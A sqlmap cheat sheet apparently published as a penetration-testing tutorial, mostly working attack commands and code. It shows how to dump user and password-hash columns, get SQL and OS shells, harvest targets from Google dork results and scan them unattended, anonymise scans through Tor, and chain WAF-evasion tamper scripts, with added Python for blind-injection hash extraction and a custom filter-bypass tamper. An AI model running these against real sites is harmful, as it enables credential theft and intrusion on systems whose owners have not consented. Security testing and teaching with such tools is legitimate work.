SQLMap Cheat Sheet – Quick Start

SQLMap is an open source Python tool that automates the detection and exploitation of SQL injection vulnerabilities. It supports a long list of database back ends, including MySQL, Microsoft SQL Server, Oracle, PostgreSQL, Firebird, SAP MaxDB, Redshift, Mckoi, Presto, MimerSQL, SQLite, Apache Ignite and FrontBase, and all six injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. It can also recognise password hashes in dumped data and crack them with a dictionary attack. Below is a sqlmap cheat sheet to help you during your testing.

We found that 8% of analyzed targets had at least one SQLi vulnerability. This was very unexpected. SQL Injections first appeared in 1998. All major development environments and frameworks include tools to eliminate them. SQL Injections should not be so common.

Acunetix

How to get SQLMap

Mac:

  1. Open a terminal
  2. Install Homebrew with the following command (the older ruby-based installer has been retired and no longer works)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

  3. Install SQLMap:

brew install sqlmap

Linux:

Kali ships sqlmap, and most distributions package it (sudo apt install sqlmap on Debian/Ubuntu). For the latest version, clone it from GitHub and run sqlmap.py with Python 3 from the cloned directory:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Windows:

  1. Get Python from: https://www.python.org/downloads/windows/
  2. Download the zip file of sqlmap from sqlmap.org and extract it
  3. To run sqlmap, open a command prompt in the extracted folder and type:
python sqlmap.py

SQLMap Cheat Sheet Methods

Running a Standard Test:

1: Test if the website is vulnerable to SQL injection

The example uses a standard GET request with an injectable-looking parameter (id). sqlmap fingerprints the back end and tries each injection technique against every parameter it finds:

sqlmap -u "https://victim-site.com/product.php?id=1"

2: Enumerate databases

List the databases on the back-end DBMS:

sqlmap -u "https://victim-site.com/product.php?id=1" --dbs

3: List tables

Find out how many tables the chosen database has and what their names are:

sqlmap -u "https://victim-site.com/product.php?id=1" -D dbname --tables

4: List the columns of a table in the selected database

List all columns of the target table:

sqlmap -u "https://victim-site.com/product.php?id=1" -D dbname -T tablename --columns

5: Dump usernames

Dump the entries of the chosen column (for example the username column) of the selected table:

sqlmap -u "https://victim-site.com/product.php?id=1" -D dbname -T tablename -C columnname --dump

6: Extract password hashes from the table

-C takes a comma-separated list, so usernames and (usually hashed) passwords can be dumped together; name the table with -T as in the previous step. When sqlmap recognises hash formats in the dump it offers to crack them with a dictionary attack, and --dump-all dumps every table it can reach:

sqlmap -u "https://victim-site.com/product.php?id=1" -D dbname -T tablename -C username,password --dump

Custom Methods:

Test a custom injection point (URL path, POST body or header):

Use * to mark the position where sqlmap should place its payload. This works in the URL path as below, and equally inside a POST body given with --data or inside a header value, which is how parameters that are not ordinary ?name=value pairs get tested:

sqlmap -u 'https://victim-site.com/page/abc*' --dbs

Google Dorks SQLMap method:

Feed sqlmap Google search results as targets, fingerprint each one (-f) and run unattended (--batch), with --answer pre-filling the prompts sqlmap would otherwise stop on:

sqlmap -g 'inurl:"products.php?id"' --random-agent -f --batch --answer="extending=N,follow=N,keep=N,exploit=N"

Get SQL Shell

Interactive SQL prompt on the back-end DBMS (--dbms skips fingerprinting when you already know the back end; the URL, --data or -r must still supply a parameter to inject into):

sqlmap --dbms=mysql -u "https://victim-site.com/login.php" --sql-shell

Get OS Shell

--os-shell tries to turn the injection into command execution. On MySQL this needs stacked queries or the FILE privilege plus a writable, known web root so sqlmap can upload a stager; on Microsoft SQL Server it uses xp_cmdshell. It writes files to the target, so check the rules of engagement first:

sqlmap --dbms=mysql -u "https://victim-site.com/login.php" --os-shell

Tor scanning:

Route requests through a local Tor SOCKS5 proxy (add --check-tor to verify the tunnel is actually in use before testing starts):

sqlmap -u "https://victim-site.com/product.php?id=1" --tor --tor-type=SOCKS5

There are 3 risk values (--risk):

  • Risk 1: Default; tests that should not damage the target
  • Risk 2: Adds heavy-query time-based injections
  • Risk 3: Adds OR-based boolean injections, which can modify or delete data if the injection lands in an UPDATE or DELETE statement

Levels (--level, 1 to 5; each level adds more payloads and more inputs to test):

  • Level 1: Default; GET and POST parameters
  • Level 2: Adds HTTP Cookie header testing
  • Level 3: Adds HTTP User-Agent and Referer header testing
  • Level 5: Adds the Host header and the full payload set

sqlmap -u "https://victim-site.com/product.php?id=1" --risk=2 --level=3

Attack Method Choices:

You can tell sqlmap which injection technique(s) to use with --technique (by default it tries all of them; letters can be combined, e.g. --technique=BEU):

  • B: Boolean-based blind
  • E: Error-based
  • U: UNION query-based
  • S: Stacked queries
  • T: Time-based blind
  • Q: Inline queries

sqlmap -u "https://victim-site.com/product.php?id=1" --technique=B
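To see what the boolean-based blind technique (B) actually does per request, here is an added example in Python that is not part of the original page or of sqlmap: a constructed, deliberately injectable product lookup backed by an in-memory SQLite database, and the character-by-character extraction that sqlmap automates against it. The table names, the admin row and the ASCII range are assumptions of the demo.

```python
import sqlite3

# Constructed stand-in for the vulnerable application (added example, not sqlmap code).
# The id parameter of product.php is concatenated straight into the query, exactly the
# bug sqlmap probes for; the page either shows a product (True) or shows nothing (False).
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE products (id INTEGER, name TEXT);
    INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
    CREATE TABLE users (username TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61a8b6f2ab9c2d0e2');
""")
stats = {"requests": 0}   # how many "HTTP requests" the blind extraction costs


def vulnerable_product_page(id_param: str) -> bool:
    """Simulated endpoint: True when the injected query returns a product row."""
    stats["requests"] += 1
    query = "SELECT name FROM products WHERE id = " + id_param   # no parameterisation
    try:
        return _db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False


def oracle(condition: str) -> bool:
    """One yes/no question to the page: 'id=1 AND (<condition>)' keeps the product only
    when the condition is true, which is all a boolean-based blind injection needs."""
    return vulnerable_product_page("1 AND (" + condition + ")")


def is_injectable() -> bool:
    """sqlmap's basic boolean check: 'AND 1=1' must behave differently from 'AND 1=2'."""
    return oracle("1=1") and not oracle("1=2")


def extract_string(expr: str, max_len: int = 64) -> str:
    """Recover the value of a SQL expression one character at a time by binary search
    over its code point, the way sqlmap's --technique=B does (ORD(MID(...)) on MySQL;
    SQLite spells the same probe unicode(substr(...)))."""
    result = ""
    for pos in range(1, max_len + 1):
        probe = "unicode(substr((%s), %d, 1))" % (expr, pos)
        if not oracle(probe + " > 0"):        # NULL past the end of the string: stop
            break
        lo, hi = 0, 127                        # ASCII range: 7 comparisons per character
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("%s > %d" % (probe, mid)):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    assert is_injectable()
    print("admin hash:", extract_string("SELECT password FROM users WHERE username = 'admin'"))
    print("second table:", extract_string(
        "SELECT name FROM sqlite_master WHERE type = 'table' LIMIT 1 OFFSET 1"))
    print("requests used:", stats["requests"])
```

Each character costs one existence probe plus seven comparisons, which is why blind extraction of a large dump is slow and why sqlmap prefers error-based or UNION techniques whenever the page allows them. Time-based blind (T) runs the same search but reads the answer from a response delay instead of a content difference.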

Force SSL:

--force-ssl makes sqlmap use HTTPS even when the URL is given as http:// (or as host and port only):

sqlmap -u "https://victim-site.com/product.php?id=1" --force-ssl

Request File:

Load a raw HTTP request (for example one saved from Burp Suite) so sqlmap reuses every header, cookie and body exactly as captured; mark a custom injection point inside the file with * if needed:

sqlmap -r request.txt

Specify Cookie Injection:

Cookie values are tested automatically from --level 2 upwards; naming the parameter with -p makes sqlmap test it regardless of the level.

sqlmap --cookie="u_id=1" -u "https://victim-site.com/page.php" -p "u_id" --level 3

Evade WAF and Filters with Tamper Scripts:

Credit to RedCode for this one. Tamper scripts rewrite each payload before it is sent (--list-tampers shows the bundled ones). Chaining every script at once, as below, is a shotgun approach: several are DBMS-specific (space2mssqlblank, space2mysqldash, sp_password) and stacking them often produces payloads that no longer parse, so in practice pick the few that match the fingerprinted DBMS and the filter in front of it.

sqlmap -u "http://www.victim-site.com/product.php?id=1" --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
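Rather than chaining every bundled script, it is usually more effective to write a tamper script matched to the filter you are facing. Below is an added example in Python of a custom tamper in the layout sqlmap expects (a tamper() function, an optional dependencies() and a __priority__), which you load with --tamper=/path/to/custom_tamper.py; it is not one of sqlmap's own scripts. The keyword list, the alternating-case trick and the quote heuristic are this example's own choices.

```python
# custom_tamper.py: a sqlmap tamper script (added example, not one of sqlmap's own).
# Usage: sqlmap -u "https://victim-site.com/product.php?id=1" --tamper=/path/to/custom_tamper.py
# The keyword list and the quote heuristic below are this example's own assumptions.

try:
    from lib.core.enums import PRIORITY      # present when sqlmap imports the script
    __priority__ = PRIORITY.NORMAL
except ImportError:                          # running or testing the file on its own
    __priority__ = 0

KEYWORDS = {"SELECT", "UNION", "AND", "OR", "FROM", "WHERE", "ORDER", "BY",
            "LIMIT", "NULL", "LIKE", "SLEEP", "BENCHMARK"}


def dependencies():
    pass   # sqlmap calls this so a script can warn about DBMS requirements


def _literal_spans(payload):
    """Return (start, end) index pairs of single- or double-quoted string literals.
    Heuristic: the first quote is taken to CLOSE the application's own literal (so it
    opens nothing) when it is the first character of the payload or when the number of
    quotes is odd; that fits boundary-style payloads such as  ' AND 'abc'='abc  and
    1' OR 1=1  without knowing the query the payload lands in."""
    quotes = [i for i, c in enumerate(payload) if c in "'\""]
    if quotes and (quotes[0] == 0 or len(quotes) % 2 == 1):
        quotes = quotes[1:]
    spans = []
    i = 0
    while i < len(quotes):
        start = quotes[i]
        j = i + 1
        while j < len(quotes) and payload[quotes[j]] != payload[start]:
            j += 1                           # look for the closing quote of the same kind
        end = quotes[j] if j < len(quotes) else len(payload)   # unterminated: runs to the end
        spans.append((start, end))
        i = j + 1
    return spans


def _in_literal(spans, idx):
    return any(s < idx < e for s, e in spans)   # strictly between the quote characters


def tamper(payload, **kwargs):
    """Outside string literals: replace spaces with /**/ and give SQL keywords
    alternating case (SeLeCt), which defeats case-sensitive and space-anchored
    signatures. Inside literals the payload is left intact."""
    if not payload:
        return payload
    spans = _literal_spans(payload)
    out = []
    i = 0
    while i < len(payload):
        ch = payload[i]
        if _in_literal(spans, i):
            out.append(ch)
            i += 1
        elif ch == " ":
            out.append("/**/")
            i += 1
        elif ch.isalpha():
            j = i
            while j < len(payload) and (payload[j].isalnum() or payload[j] == "_"):
                j += 1
            word = payload[i:j]
            if word.upper() in KEYWORDS:
                word = "".join(c.upper() if k % 2 == 0 else c.lower()
                               for k, c in enumerate(word))
            out.append(word)
            i = j
        else:
            out.append(ch)
            i += 1
    return "".join(out)
```

Keeping string literals untouched is the part home-grown tamper scripts most often get wrong: a payload that rewrites the inside of 'abc'='abc' no longer compares equal and the injection silently stops working. The heuristic here only guesses which quote closes the application's own literal, so verify the rewritten payloads with -v 3, which prints them as sent.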

Reference for some common switches (from the sqlmap help output):


    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -d DIRECT           Connection string for direct database connection
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --smart             Perform thorough tests only if positive heuristic(s)
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles


Conclusion

SQLMap is a very powerful tool and is great when you want to automate your tasks instead of manually trying every injection you can think of. There are many more options than we have covered here, but the cases above cover the majority of day-to-day use. We will create a video in the future to demonstrate the techniques shown above for users who are visual learners.

Remember there is no replacement for learning how the attacks work manually before learning a tool. We always recommend you learn how and why something happens before using a tool to do the work for you.

Hope you like the SQLMap cheat sheet we have provided! If you have anything you would like to add to the list, please feel free to reach out to us on our contact page.

References:

https://sqlmap.org

https://github.com/sqlmapproject/sqlmap/wiki/Usage

https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423

https://www.acunetix.com/white-papers/acunetix-web-application-vulnerability-report-2020/#sql-injection-sqli

